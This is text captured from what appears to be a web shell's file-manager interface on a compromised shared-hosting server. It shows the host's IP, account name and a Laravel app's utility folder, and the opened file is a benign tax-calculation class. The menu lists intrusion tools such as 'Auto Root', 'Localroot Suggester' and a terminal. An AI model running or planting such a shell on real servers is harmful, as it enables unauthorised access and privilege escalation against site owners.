Linux amd.servercpanel.com 5.14.0-570.25.1.el9_6.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Jul 9 04:57:09 EDT 2025 x86_64
LiteSpeed
Server IP : 161.248.188.165 & Your IP : 216.73.216.219
Domains :
Cant Read [ /etc/named.conf ]
User : oishifashion
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
oishifashion /
ap.tsgbd.com /
aa /
app /
Utils /
Delete
Unzip
Name
Size
Permission
Date
Action
AccountTransactionUtil.php
555
B
-rw-r--r--
2025-02-06 04:36
BusinessUtil.php
14.66
KB
-rw-r--r--
2025-02-06 04:36
CashRegisterUtil.php
22.41
KB
-rw-r--r--
2025-02-06 04:36
ContactUtil.php
10.62
KB
-rw-r--r--
2025-02-06 04:36
InstallUtil.php
6.17
KB
-rw-r--r--
2025-02-06 04:36
ModuleUtil.php
17.28
KB
-rw-r--r--
2025-02-06 04:36
NotificationUtil.php
16.89
KB
-rw-r--r--
2025-02-06 04:36
ProductUtil.php
105.35
KB
-rw-r--r--
2025-02-06 04:36
RestaurantUtil.php
10.32
KB
-rw-r--r--
2025-02-06 04:36
TaxUtil.php
540
B
-rw-r--r--
2025-02-06 04:36
TransactionUtil.php
296.34
KB
-rw-r--r--
2025-02-06 04:36
Util.php
67.91
KB
-rw-r--r--
2025-02-06 04:36
Save
Rename
<?php namespace App\Utils; use App\TaxRate; class AccountTransactionUtil extends Util { /** * Updates tax amount of a tax group * * @param int $group_tax_id * @return void */ public function updateGroupTaxAmount($group_tax_id) { $amount = 0; $tax_rate = TaxRate::where('id', $group_tax_id)->with(['sub_taxes'])->first(); foreach ($tax_rate->sub_taxes as $sub_tax) { $amount += $sub_tax->amount; } $tax_rate->amount = $amount; $tax_rate->save(); } }